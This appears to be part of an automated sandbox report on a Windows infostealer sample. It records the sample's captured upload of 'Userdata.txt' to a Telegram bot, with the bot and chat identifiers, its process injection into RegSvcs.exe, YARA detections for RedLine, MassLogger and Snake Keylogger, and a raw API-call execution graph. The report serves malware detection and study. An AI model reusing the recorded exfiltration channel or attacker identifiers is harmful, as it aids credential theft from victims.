                                                                        Data Ascii: --===============8dd31b91c731df5Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                        2025-01-11 01:55:29 UTC388INHTTP/1.1 200 OK
                                                                        Server: nginx/1.18.0
                                                                        Date: Sat, 11 Jan 2025 01:55:29 GMT
                                                                        Content-Type: application/json
                                                                        Content-Length: 561
                                                                        Connection: close
                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                        Access-Control-Allow-Origin: *
                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                        2025-01-11 01:55:29 UTC561INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 39 38 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 38 31 35 32 33 39 33 39 31 39 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 4f 56 41 4c 4f 47 47 45 52 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4e 4f 56 41 4c 4f 47 47 45 52 44 41 4e 4e 59 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 34 33 37 30 39 32 37 32 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 49 66 65 61 6e 79 69 63 68 75 6b 77 75 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 49 66 65 61 6e 79 69 63 68 75 6b 77 75 30 30 39 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 36 30 35 32 39 2c
                                                                        Data Ascii: {"ok":true,"result":{"message_id":1984,"from":{"id":8152393919,"is_bot":true,"first_name":"NOVALOGGER","username":"NOVALOGGERDANNYbot"},"chat":{"id":1437092720,"first_name":"Ifeanyichukwu","username":"Ifeanyichukwu009","type":"private"},"date":1736560529,


                                                                        Statistics

                                                                        CPU Usage

                                                                        Click to jump to process

                                                                        Memory Usage

                                                                        Click to jump to process

                                                                        High Level Behavior Distribution

                                                                        Click to dive into process behavior distribution

                                                                        Behavior

                                                                        Click to jump to process

                                                                        System Behavior

                                                                        General

                                                                        Target ID:0
                                                                        Start time:20:55:16
                                                                        Start date:10/01/2025
                                                                        Path:C:\Users\user\Desktop\njVvgA8pEB.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\Desktop\njVvgA8pEB.exe"
                                                                        Imagebase:0x310000
                                                                        File size:1'118'720 bytes
                                                                        MD5 hash:D689D0763FAAA679D5DF32A3C14F9708
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000000.00000002.1722801122.0000000000FF0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                        Reputation:low
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:1
                                                                        Start time:20:55:17
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Users\user\Desktop\njVvgA8pEB.exe"
                                                                        Imagebase:0x1b0000
                                                                        File size:45'984 bytes
                                                                        MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:2
                                                                        Start time:20:55:17
                                                                        Start date:10/01/2025
                                                                        Path:C:\Users\user\Desktop\njVvgA8pEB.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\Desktop\njVvgA8pEB.exe"
                                                                        Imagebase:0x310000
                                                                        File size:1'118'720 bytes
                                                                        MD5 hash:D689D0763FAAA679D5DF32A3C14F9708
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000002.00000002.1740251386.0000000001400000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                        Reputation:low
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:3
                                                                        Start time:20:55:18
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\Desktop\njVvgA8pEB.exe"
                                                                        Imagebase:0xbb0000
                                                                        File size:45'984 bytes
                                                                        MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000003.00000002.4188901545.00000000056D0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.4188901545.00000000056D0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.4188901545.00000000056D0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000003.00000002.4188901545.00000000056D0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.4188901545.00000000056D0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                        • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000003.00000002.4188901545.00000000056D0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                                        • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000003.00000002.4186590756.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.4186590756.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.4186590756.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000003.00000002.4186590756.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.4186590756.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                        • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000003.00000002.4187157369.0000000003426000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.4187157369.0000000003426000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.4187157369.0000000003426000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000003.00000002.4188676018.0000000004291000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.4188676018.0000000004291000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.4188676018.0000000004291000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000003.00000002.4188676018.0000000004291000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.4188676018.0000000004291000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                        • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000003.00000002.4183734715.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                        • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000003.00000002.4186778603.00000000031D0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.4186778603.00000000031D0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.4186778603.00000000031D0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000003.00000002.4186778603.00000000031D0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.4186778603.00000000031D0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                        • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000003.00000002.4186778603.00000000031D0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                                        Reputation:high
                                                                        Has exited:false

                                                                        Disassembly

                                                                        Reset < >

                                                                          Execution Graph

                                                                          Execution Coverage:3.5%
                                                                          Dynamic/Decrypted Code Coverage:0.4%
                                                                          Signature Coverage:7.6%
                                                                          Total number of Nodes:2000
                                                                          Total number of Limit Nodes:164
                                                                          execution_graph 100263 313633 100264 31366a 100263->100264 100265 3136e7 100264->100265 100266 313688 100264->100266 100302 3136e5 100264->100302 100270 34d0cc 100265->100270 100271 3136ed 100265->100271 100267 313695 100266->100267 100268 31374b PostQuitMessage 100266->100268 100273 34d154 100267->100273 100274 3136a0 100267->100274 100305 3136d8 100268->100305 100269 3136ca DefWindowProcW 100269->100305 100312 321070 10 API calls Mailbox 100270->100312 100275 3136f2 100271->100275 100276 313715 SetTimer RegisterWindowMessageW 100271->100276 100328 372527 71 API calls _memset 100273->100328 100278 313755 100274->100278 100279 3136a8 100274->100279 100282 3136f9 KillTimer 100275->100282 100283 34d06f 100275->100283 100280 31373e CreatePopupMenu 100276->100280 100276->100305 100277 34d0f3 100313 321093 331 API calls Mailbox 100277->100313 100310 3144a0 64 API calls _memset 100278->100310 100285 3136b3 100279->100285 100297 34d139 100279->100297 100280->100305 100308 31443a Shell_NotifyIconW _memset 100282->100308 100287 34d074 100283->100287 100288 34d0a8 MoveWindow 100283->100288 100290 3136be 100285->100290 100291 34d124 100285->100291 100294 34d097 SetFocus 100287->100294 100295 34d078 100287->100295 100288->100305 100290->100269 100314 31443a Shell_NotifyIconW _memset 100290->100314 100326 372d36 81 API calls _memset 100291->100326 100292 34d166 100292->100269 100292->100305 100293 313764 100293->100305 100294->100305 100295->100290 100299 34d081 100295->100299 100296 31370c 100309 313114 DeleteObject DestroyWindow Mailbox 100296->100309 100297->100269 100327 367c36 59 API calls Mailbox 100297->100327 100311 321070 10 API calls Mailbox 100299->100311 100302->100269 100306 34d118 100315 31434a 100306->100315 100308->100296 100309->100305 100310->100293 100311->100305 100312->100277 100313->100290 100314->100306 100316 314375 _memset 100315->100316 100329 314182 100316->100329 100320 314430 Shell_NotifyIconW 100323 314422 100320->100323 100321 314414 Shell_NotifyIconW 100321->100323 100322 3143fa 100322->100320 100322->100321 100333 31407c 100323->100333 100325 314429 100325->100302 100326->100293 100327->100302 100328->100292 100330 34d423 100329->100330 100331 314196 100329->100331 100330->100331 100332 34d42c DestroyIcon 100330->100332 100331->100322 100355 372f94 62 API calls _W_store_winword 100331->100355 100332->100331 100334 314098 100333->100334 100354 31416f Mailbox 100333->100354 100356 317a16 100334->100356 100337 3140b3 100361 317bcc 100337->100361 100338 34d3c8 LoadStringW 100341 34d3e2 100338->100341 100340 3140c8 100340->100341 100342 3140d9 100340->100342 100343 317b2e 59 API calls 100341->100343 100344 3140e3 100342->100344 100345 314174 100342->100345 100348 34d3ec 100343->100348 100370 317b2e 100344->100370 100379 318047 100345->100379 100351 3140ed _memset _wcscpy 100348->100351 100383 317cab 100348->100383 100350 34d40e 100353 317cab 59 API calls 100350->100353 100352 314155 Shell_NotifyIconW 100351->100352 100352->100354 100353->100351 100354->100325 100355->100322 100390 330db6 100356->100390 100358 317a3b 100400 318029 100358->100400 100362 317c45 100361->100362 100363 317bd8 __NMSG_WRITE 100361->100363 100432 317d2c 100362->100432 100366 317c13 100363->100366 100367 317bee 100363->100367 100365 317bf6 _memmove 100365->100340 100369 318029 59 API calls 100366->100369 100431 317f27 59 API calls Mailbox 100367->100431 100369->100365 100371 317b40 100370->100371 100372 34ec6b 100370->100372 100440 317a51 100371->100440 100446 367bdb 59 API calls _memmove 100372->100446 100375 317b4c 100375->100351 100376 34ec75 100377 318047 59 API calls 100376->100377 100378 34ec7d Mailbox 100377->100378 100380 318052 100379->100380 100381 31805a 100379->100381 100447 317f77 59 API calls 2 library calls 100380->100447 100381->100351 100384 34ed4a 100383->100384 100385 317cbf 100383->100385 100387 318029 59 API calls 100384->100387 100448 317c50 100385->100448 100389 34ed55 __NMSG_WRITE _memmove 100387->100389 100388 317cca 100388->100350 100393 330dbe 100390->100393 100392 330dd8 100392->100358 100393->100392 100395 330ddc std::exception::exception 100393->100395 100403 33571c 100393->100403 100420 3333a1 DecodePointer 100393->100420 100421 33859b RaiseException 100395->100421 100397 330e06 100422 3384d1 58 API calls _free 100397->100422 100399 330e18 100399->100358 100401 330db6 Mailbox 59 API calls 100400->100401 100402 3140a6 100401->100402 100402->100337 100402->100338 100404 335797 100403->100404 100408 335728 100403->100408 100429 3333a1 DecodePointer 100404->100429 100406 33579d 100430 338b28 58 API calls __getptd_noexit 100406->100430 100407 335733 100407->100408 100423 33a16b 58 API calls __NMSG_WRITE 100407->100423 100424 33a1c8 58 API calls 4 library calls 100407->100424 100425 33309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 100407->100425 100408->100407 100411 33575b RtlAllocateHeap 100408->100411 100414 335783 100408->100414 100418 335781 100408->100418 100426 3333a1 DecodePointer 100408->100426 100411->100408 100412 33578f 100411->100412 100412->100393 100427 338b28 58 API calls __getptd_noexit 100414->100427 100428 338b28 58 API calls __getptd_noexit 100418->100428 100420->100393 100421->100397 100422->100399 100423->100407 100424->100407 100426->100408 100427->100418 100428->100412 100429->100406 100430->100412 100431->100365 100433 317d3a 100432->100433 100435 317d43 _memmove 100432->100435 100433->100435 100436 317e4f 100433->100436 100435->100365 100437 317e62 100436->100437 100439 317e5f _memmove 100436->100439 100438 330db6 Mailbox 59 API calls 100437->100438 100438->100439 100439->100435 100441 317a5f 100440->100441 100442 317a85 _memmove 100440->100442 100441->100442 100443 330db6 Mailbox 59 API calls 100441->100443 100442->100375 100444 317ad4 100443->100444 100445 330db6 Mailbox 59 API calls 100444->100445 100445->100442 100446->100376 100447->100381 100449 317c5f __NMSG_WRITE 100448->100449 100450 318029 59 API calls 100449->100450 100451 317c70 _memmove 100449->100451 100452 34ed07 _memmove 100450->100452 100451->100388 100453 311055 100458 312649 100453->100458 100468 317667 100458->100468 100462 312754 100464 31105a 100462->100464 100476 313416 59 API calls 2 library calls 100462->100476 100465 332d40 100464->100465 100484 332c44 100465->100484 100467 311064 100469 330db6 Mailbox 59 API calls 100468->100469 100470 317688 100469->100470 100471 330db6 Mailbox 59 API calls 100470->100471 100472 3126b7 100471->100472 100473 313582 100472->100473 100477 3135b0 100473->100477 100476->100462 100478 3135bd 100477->100478 100479 3135a1 100477->100479 100478->100479 100480 3135c4 RegOpenKeyExW 100478->100480 100479->100462 100480->100479 100481 3135de RegQueryValueExW 100480->100481 100482 313614 RegCloseKey 100481->100482 100483 3135ff 100481->100483 100482->100479 100483->100482 100485 332c50 type_info::_Type_info_dtor 100484->100485 100492 333217 100485->100492 100491 332c77 type_info::_Type_info_dtor 100491->100467 100509 339c0b 100492->100509 100494 332c59 100495 332c88 DecodePointer DecodePointer 100494->100495 100496 332c65 100495->100496 100497 332cb5 100495->100497 100506 332c82 100496->100506 100497->100496 100555 3387a4 59 API calls __filbuf 100497->100555 100499 332d18 EncodePointer EncodePointer 100499->100496 100500 332cec 100500->100496 100505 332d06 EncodePointer 100500->100505 100557 338864 61 API calls 2 library calls 100500->100557 100501 332cc7 100501->100499 100501->100500 100556 338864 61 API calls 2 library calls 100501->100556 100504 332d00 100504->100496 100504->100505 100505->100499 100558 333220 100506->100558 100510 339c2f EnterCriticalSection 100509->100510 100511 339c1c 100509->100511 100510->100494 100516 339c93 100511->100516 100513 339c22 100513->100510 100540 3330b5 58 API calls 3 library calls 100513->100540 100517 339c9f type_info::_Type_info_dtor 100516->100517 100518 339cc0 100517->100518 100519 339ca8 100517->100519 100527 339ce1 type_info::_Type_info_dtor 100518->100527 100544 33881d 58 API calls __malloc_crt 100518->100544 100541 33a16b 58 API calls __NMSG_WRITE 100519->100541 100522 339cad 100542 33a1c8 58 API calls 4 library calls 100522->100542 100523 339cd5 100525 339ceb 100523->100525 100526 339cdc 100523->100526 100530 339c0b __lock 58 API calls 100525->100530 100545 338b28 58 API calls __getptd_noexit 100526->100545 100527->100513 100528 339cb4 100543 33309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 100528->100543 100532 339cf2 100530->100532 100534 339d17 100532->100534 100535 339cff 100532->100535 100547 332d55 100534->100547 100546 339e2b InitializeCriticalSectionAndSpinCount 100535->100546 100538 339d0b 100553 339d33 LeaveCriticalSection _doexit 100538->100553 100541->100522 100542->100528 100544->100523 100545->100527 100546->100538 100548 332d87 __dosmaperr 100547->100548 100549 332d5e RtlFreeHeap 100547->100549 100548->100538 100549->100548 100550 332d73 100549->100550 100554 338b28 58 API calls __getptd_noexit 100550->100554 100552 332d79 GetLastError 100552->100548 100553->100527 100554->100552 100555->100501 100556->100500 100557->100504 100561 339d75 LeaveCriticalSection 100558->100561 100560 332c87 100560->100491 100561->100560 100562 337c56 100563 337c62 type_info::_Type_info_dtor 100562->100563 100599 339e08 GetStartupInfoW 100563->100599 100565 337c67 100601 338b7c GetProcessHeap 100565->100601 100567 337cbf 100568 337cca 100567->100568 100684 337da6 58 API calls 3 library calls 100567->100684 100602 339ae6 100568->100602 100571 337cd0 100572 337cdb __RTC_Initialize 100571->100572 100685 337da6 58 API calls 3 library calls 100571->100685 100623 33d5d2 100572->100623 100575 337cea 100576 337cf6 GetCommandLineW 100575->100576 100686 337da6 58 API calls 3 library calls 100575->100686 100642 344f23 GetEnvironmentStringsW 100576->100642 100579 337cf5 100579->100576 100582 337d10 100583 337d1b 100582->100583 100687 3330b5 58 API calls 3 library calls 100582->100687 100652 344d58 100583->100652 100586 337d21 100587 337d2c 100586->100587 100688 3330b5 58 API calls 3 library calls 100586->100688 100666 3330ef 100587->100666 100590 337d34 100591 337d3f __wwincmdln 100590->100591 100689 3330b5 58 API calls 3 library calls 100590->100689 100672 3147d0 100591->100672 100594 337d53 100595 337d62 100594->100595 100690 333358 58 API calls _doexit 100594->100690 100691 3330e0 58 API calls _doexit 100595->100691 100598 337d67 type_info::_Type_info_dtor 100600 339e1e 100599->100600 100600->100565 100601->100567 100692 333187 36 API calls 2 library calls 100602->100692 100604 339aeb 100693 339d3c InitializeCriticalSectionAndSpinCount __ioinit 100604->100693 100606 339af0 100607 339af4 100606->100607 100695 339d8a TlsAlloc 100606->100695 100694 339b5c 61 API calls 2 library calls 100607->100694 100610 339af9 100610->100571 100611 339b06 100611->100607 100612 339b11 100611->100612 100696 3387d5 100612->100696 100615 339b53 100704 339b5c 61 API calls 2 library calls 100615->100704 100618 339b32 100618->100615 100620 339b38 100618->100620 100619 339b58 100619->100571 100703 339a33 58 API calls 4 library calls 100620->100703 100622 339b40 GetCurrentThreadId 100622->100571 100624 33d5de type_info::_Type_info_dtor 100623->100624 100625 339c0b __lock 58 API calls 100624->100625 100626 33d5e5 100625->100626 100627 3387d5 __calloc_crt 58 API calls 100626->100627 100629 33d5f6 100627->100629 100628 33d661 GetStartupInfoW 100631 33d7a5 100628->100631 100633 33d676 100628->100633 100629->100628 100630 33d601 type_info::_Type_info_dtor @_EH4_CallFilterFunc@8 100629->100630 100630->100575 100632 33d86d 100631->100632 100636 33d7f2 GetStdHandle 100631->100636 100638 33d805 GetFileType 100631->100638 100717 339e2b InitializeCriticalSectionAndSpinCount 100631->100717 100718 33d87d LeaveCriticalSection _doexit 100632->100718 100633->100631 100635 3387d5 __calloc_crt 58 API calls 100633->100635 100637 33d6c4 100633->100637 100635->100633 100636->100631 100637->100631 100639 33d6f8 GetFileType 100637->100639 100716 339e2b InitializeCriticalSectionAndSpinCount 100637->100716 100638->100631 100639->100637 100643 337d06 100642->100643 100644 344f34 100642->100644 100648 344b1b GetModuleFileNameW 100643->100648 100719 33881d 58 API calls __malloc_crt 100644->100719 100646 344f5a _memmove 100647 344f70 FreeEnvironmentStringsW 100646->100647 100647->100643 100649 344b4f _wparse_cmdline 100648->100649 100651 344b8f _wparse_cmdline 100649->100651 100720 33881d 58 API calls __malloc_crt 100649->100720 100651->100582 100653 344d71 __NMSG_WRITE 100652->100653 100657 344d69 100652->100657 100654 3387d5 __calloc_crt 58 API calls 100653->100654 100655 344d9a __NMSG_WRITE 100654->100655 100655->100657 100658 3387d5 __calloc_crt 58 API calls 100655->100658 100659 344df1 100655->100659 100660 344e16 100655->100660 100663 344e2d 100655->100663 100721 344607 58 API calls __filbuf 100655->100721 100656 332d55 _free 58 API calls 100656->100657 100657->100586 100658->100655 100659->100656 100661 332d55 _free 58 API calls 100660->100661 100661->100657 100722 338dc6 IsProcessorFeaturePresent 100663->100722 100665 344e39 100665->100586 100667 3330fb __IsNonwritableInCurrentImage 100666->100667 100745 33a4d1 100667->100745 100669 333119 __initterm_e 100670 332d40 __cinit 67 API calls 100669->100670 100671 333138 _doexit __IsNonwritableInCurrentImage 100669->100671 100670->100671 100671->100590 100673 3147ea 100672->100673 100683 314889 100672->100683 100674 314824 IsThemeActive 100673->100674 100748 33336c 100674->100748 100678 314850 100760 3148fd SystemParametersInfoW SystemParametersInfoW 100678->100760 100680 31485c 100761 313b3a 100680->100761 100682 314864 SystemParametersInfoW 100682->100683 100683->100594 100684->100568 100685->100572 100686->100579 100690->100595 100691->100598 100692->100604 100693->100606 100694->100610 100695->100611 100698 3387dc 100696->100698 100699 338817 100698->100699 100700 3387fa 100698->100700 100705 3451f6 100698->100705 100699->100615 100702 339de6 TlsSetValue 100699->100702 100700->100698 100700->100699 100713 33a132 Sleep 100700->100713 100702->100618 100703->100622 100704->100619 100706 345201 100705->100706 100707 34521c 100705->100707 100706->100707 100708 34520d 100706->100708 100709 34522c HeapAlloc 100707->100709 100711 345212 100707->100711 100715 3333a1 DecodePointer 100707->100715 100714 338b28 58 API calls __getptd_noexit 100708->100714 100709->100707 100709->100711 100711->100698 100713->100700 100714->100711 100715->100707 100716->100637 100717->100631 100718->100630 100719->100646 100720->100651 100721->100655 100723 338dd1 100722->100723 100728 338c59 100723->100728 100727 338dec 100727->100665 100729 338c73 _memset ___raise_securityfailure 100728->100729 100730 338c93 IsDebuggerPresent 100729->100730 100736 33a155 SetUnhandledExceptionFilter UnhandledExceptionFilter 100730->100736 100733 338d7a 100735 33a140 GetCurrentProcess TerminateProcess 100733->100735 100734 338d57 ___raise_securityfailure 100737 33c5f6 100734->100737 100735->100727 100736->100734 100738 33c600 IsProcessorFeaturePresent 100737->100738 100739 33c5fe 100737->100739 100741 34590a 100738->100741 100739->100733 100744 3458b9 5 API calls ___raise_securityfailure 100741->100744 100743 3459ed 100743->100733 100744->100743 100746 33a4d4 EncodePointer 100745->100746 100746->100746 100747 33a4ee 100746->100747 100747->100669 100749 339c0b __lock 58 API calls 100748->100749 100750 333377 DecodePointer EncodePointer 100749->100750 100813 339d75 LeaveCriticalSection 100750->100813 100752 314849 100753 3333d4 100752->100753 100754 3333f8 100753->100754 100755 3333de 100753->100755 100754->100678 100755->100754 100814 338b28 58 API calls __getptd_noexit 100755->100814 100757 3333e8 100815 338db6 9 API calls __filbuf 100757->100815 100759 3333f3 100759->100678 100760->100680 100762 313b47 __write_nolock 100761->100762 100763 317667 59 API calls 100762->100763 100764 313b51 GetCurrentDirectoryW 100763->100764 100816 313766 100764->100816 100766 313b7a IsDebuggerPresent 100767 34d272 MessageBoxA 100766->100767 100768 313b88 100766->100768 100770 34d28c 100767->100770 100768->100770 100771 313ba5 100768->100771 100799 313c61 100768->100799 100769 313c68 SetCurrentDirectoryW 100772 313c75 Mailbox 100769->100772 101015 317213 59 API calls Mailbox 100770->101015 100897 317285 100771->100897 100772->100682 100775 34d29c 100780 34d2b2 SetCurrentDirectoryW 100775->100780 100777 313bc3 GetFullPathNameW 100778 317bcc 59 API calls 100777->100778 100779 313bfe 100778->100779 100913 32092d 100779->100913 100780->100772 100783 313c1c 100784 313c26 100783->100784 101016 36874b AllocateAndInitializeSid CheckTokenMembership FreeSid 100783->101016 100929 313a46 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 100784->100929 100787 34d2cf 100787->100784 100790 34d2e0 100787->100790 101017 314706 100790->101017 100791 313c30 100793 313c43 100791->100793 100795 31434a 68 API calls 100791->100795 100937 3209d0 100793->100937 100794 34d2e8 101024 317de1 100794->101024 100795->100793 100798 313c4e 100798->100799 101014 31443a Shell_NotifyIconW _memset 100798->101014 100799->100769 100800 34d2f5 100802 34d324 100800->100802 100803 34d2ff 100800->100803 100813->100752 100814->100757 100815->100759 100817 317667 59 API calls 100816->100817 100818 31377c 100817->100818 101028 313d31 100818->101028 100820 31379a 100821 314706 61 API calls 100820->100821 100822 3137ae 100821->100822 100823 317de1 59 API calls 100822->100823 100824 3137bb 100823->100824 101042 314ddd 100824->101042 100827 34d173 101109 37955b 100827->101109 100828 3137dc Mailbox 100832 318047 59 API calls 100828->100832 100831 34d192 100834 332d55 _free 58 API calls 100831->100834 100835 3137ef 100832->100835 100836 34d19f 100834->100836 101066 31928a 100835->101066 100838 314e4a 84 API calls 100836->100838 100840 34d1a8 100838->100840 100844 313ed0 59 API calls 100840->100844 100841 317de1 59 API calls 100842 313808 100841->100842 101069 3184c0 100842->101069 100846 34d1c3 100844->100846 100845 31381a Mailbox 100847 317de1 59 API calls 100845->100847 100849 313ed0 59 API calls 100846->100849 100848 313840 100847->100848 100851 3184c0 69 API calls 100848->100851 100850 34d1df 100849->100850 100852 314706 61 API calls 100850->100852 100854 31384f Mailbox 100851->100854 100853 34d204 100852->100853 100855 313ed0 59 API calls 100853->100855 100857 317667 59 API calls 100854->100857 100856 34d210 100855->100856 100858 318047 59 API calls 100856->100858 100859 31386d 100857->100859 100860 34d21e 100858->100860 101073 313ed0 100859->101073 100862 313ed0 59 API calls 100860->100862 100864 34d22d 100862->100864 100871 318047 59 API calls 100864->100871 100866 313887 100866->100840 100867 313891 100866->100867 100868 332efd _W_store_winword 60 API calls 100867->100868 100869 31389c 100868->100869 100869->100846 100870 3138a6 100869->100870 100873 332efd _W_store_winword 60 API calls 100870->100873 100872 34d24f 100871->100872 100874 313ed0 59 API calls 100872->100874 100875 3138b1 100873->100875 100876 34d25c 100874->100876 100875->100850 100877 3138bb 100875->100877 100876->100876 100878 332efd _W_store_winword 60 API calls 100877->100878 100879 3138c6 100878->100879 100879->100864 100880 313907 100879->100880 100882 313ed0 59 API calls 100879->100882 100880->100864 100881 313914 100880->100881 101089 3192ce 100881->101089 100884 3138ea 100882->100884 100886 318047 59 API calls 100884->100886 100888 3138f8 100886->100888 100890 313ed0 59 API calls 100888->100890 100890->100880 100892 31928a 59 API calls 100894 31394f 100892->100894 100893 318ee0 60 API calls 100893->100894 100894->100892 100894->100893 100895 313ed0 59 API calls 100894->100895 100896 313995 Mailbox 100894->100896 100895->100894 100896->100766 100898 317292 __write_nolock 100897->100898 100899 34ea22 _memset 100898->100899 100900 3172ab 100898->100900 100902 34ea3e GetOpenFileNameW 100899->100902 101974 314750 100900->101974 100904 34ea8d 100902->100904 100907 317bcc 59 API calls 100904->100907 100909 34eaa2 100907->100909 100909->100909 100910 3172c9 102002 31686a 100910->102002 100914 32093a __write_nolock 100913->100914 102254 316d80 100914->102254 100916 32093f 100928 313c14 100916->100928 102265 32119e 89 API calls 100916->102265 100918 32094c 100918->100928 102266 323ee7 91 API calls Mailbox 100918->102266 100920 320955 100921 320959 GetFullPathNameW 100920->100921 100920->100928 100922 317bcc 59 API calls 100921->100922 100923 320985 100922->100923 100924 317bcc 59 API calls 100923->100924 100925 320992 100924->100925 100926 317bcc 59 API calls 100925->100926 100927 354cab _wcscat 100925->100927 100926->100928 100928->100775 100928->100783 100930 313ab0 LoadImageW RegisterClassExW 100929->100930 100931 34d261 100929->100931 102303 313041 7 API calls 100930->102303 102304 3147a0 LoadImageW EnumResourceNamesW 